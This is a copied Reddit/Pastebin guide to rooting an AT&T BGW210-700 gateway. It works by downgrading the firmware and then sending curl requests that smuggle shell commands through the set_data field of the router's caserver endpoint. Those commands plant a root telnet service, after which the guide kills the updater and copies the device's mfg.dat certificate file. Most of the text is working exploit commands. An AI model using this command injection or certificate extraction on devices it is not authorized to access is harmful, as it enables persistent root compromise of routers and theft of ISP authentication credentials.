Copied as a verbatim backup from pastebin: https://pastebin.com/SUGLTfv4
Original reddit thread: https://www.reddit.com/r/ATT/comments/g59rwm/bgw210700_root_exploitbypass/
-------------------------------------------------------------------------------------------------
#Send me a message @ reddit.com/user/Streiw/ if you need any help following these instructions.
#Shout out to Earlz for offering insight into how the NVG510 was exploited before.
Downgrade to this firmware:
http://gateway.c01.sbcglobal.net/firmware/001E46/BGW210-700_1.0.29/spTurquoise210-700_1.0.29.bin
mega.nz mirror:
https://mega.nz/file/35lBkbzC#MTrKdt57SEuz81Tn3MBKm-o_s1zv643MLmxyKILjsk8
Once downgraded, go to http://192.168.1.254/cgi-bin/ipalloc.ha , type your device access code to login, and assign a static IP to your PC that you'll be executing the CURL commands from.
Once you assign a static IP, refresh your PC's local ip address. using ifconfig, or ipconfig if on windows (cmd prompt: ipconfig /release and then ipconfig /renew)
Once that's done, open http://192.168.1.254/cgi-bin/ipalloc.ha and authenticate again
Once you authenticate, run these CURL(you'll need to download CURL) commands from your command prompt while keeping the router config page open in a browser:
(tech has no password when prompted)
curl -k -u tech -H "User-Agent: blah" -H "Connection:Keep-Alive" -d "appid=001&set_data=| echo 28telnet stream tcp nowait root /usr/sbin/telnetd -i -l /bin/nsh > /var/etc/inetd.d/telnet28|" -v --http1.1 https://192.168.1.254:49955/caserver
curl -k -u tech -H "User-Agent: blah" -H "Connection:Keep-Alive" -d "appid=001&set_data=| pfs -a /var/etc/inetd.d/telnet28|" -v --http1.1 https://192.168.1.254:49955/caserver
curl -k -u tech -H "User-Agent: blah" -H "Connection:Keep-Alive" -d "appid=001&set_data=| pfs -s|" -v --http1.1 https://192.168.1.254:49955/caserver
curl -k -u tech -H "User-Agent: blah" -H "Connection:Keep-Alive" -d "appid=001&set_data=| reboot|" -v --http1.1 https://192.168.1.254:49955/caserver
Router will reboot after the final command, and you'll be able to telnet on port 28 as Admin w/ device access code as the password once it reboots.
(Use Putty if using a Windows PC)
Once you're logged in via telnet, type ! and press enter to elevate to a root sh terminal
Now, type top and let the telnet terminal populate with the running processes of the router.
Once the top command displays all of the running process, look for a process labelled: /usr/bin/udpsvd -E 0 69 tftpd /lib/firmware
Press CTRL + C to break out of the top command.
type kill PID_number_of_udpsvd; For example: kill 1102
This kills the auto update script so that you can make changes, or copy your 802.11x certificates without the ATT firmware automatically updating when you aren't ready for it.
NOTES:
Successful CURL command looks like this: https://imgur.com/a/Y7gZ6WC
<response>
<status>OK</status>
If you receive a <status>You are not authorized to view this page</status> message, you need to go back to step 2, assign a new IP to your CURL command prompt PC, and follow the rest of the guide in order.
***This is the most reliable way I've found to allow command injection once the "Not authorized to view this page" status occurs.
Various commands to run from root shell:
Make root file system writable:
mount -o remount,rw /dev/ubi0 /
echo "15000 61000" > /proc/sys/net/ipv4/ip_local_port_range ####INCREASE CONNECTION NUMBER IN IP TABLES
echo "30" > /proc/sys/net/ipv4/tcp_fin_timeout ####REDUCE TIME OUT TIME FOR CONNECTIONS
echo "1" > /proc/sys/net/ipv4/tcp_tw_recycle | echo "1" > /proc/sys/net/ipv4/tcp_tw_reuse ### TCP TW REUSE/RECYCLE ENABLE
echo "1024" > /proc/sys/net/core/somaxconn #### MAX CONNECTIONS ON SOCKET
echo "30000" > /proc/sys/net/netfilter/nf_conntrack_max ### INCREASE NAT CONNECTIONS FROM DEFAULT 8192 to 30000
**I AM NOT RESPONSIBLE IF YOU BRICK YOUR DEVICE**
MFG.dat for certificate extraction:
mount -o remount,rw /dev/ubi0 /
mount mtd:mfg -t jffs2 /mfg
cp /mfg/mfg.dat /www/att/mfg.dat
enter http://192.168.1.254/mfg.dat in browser and save as .dat file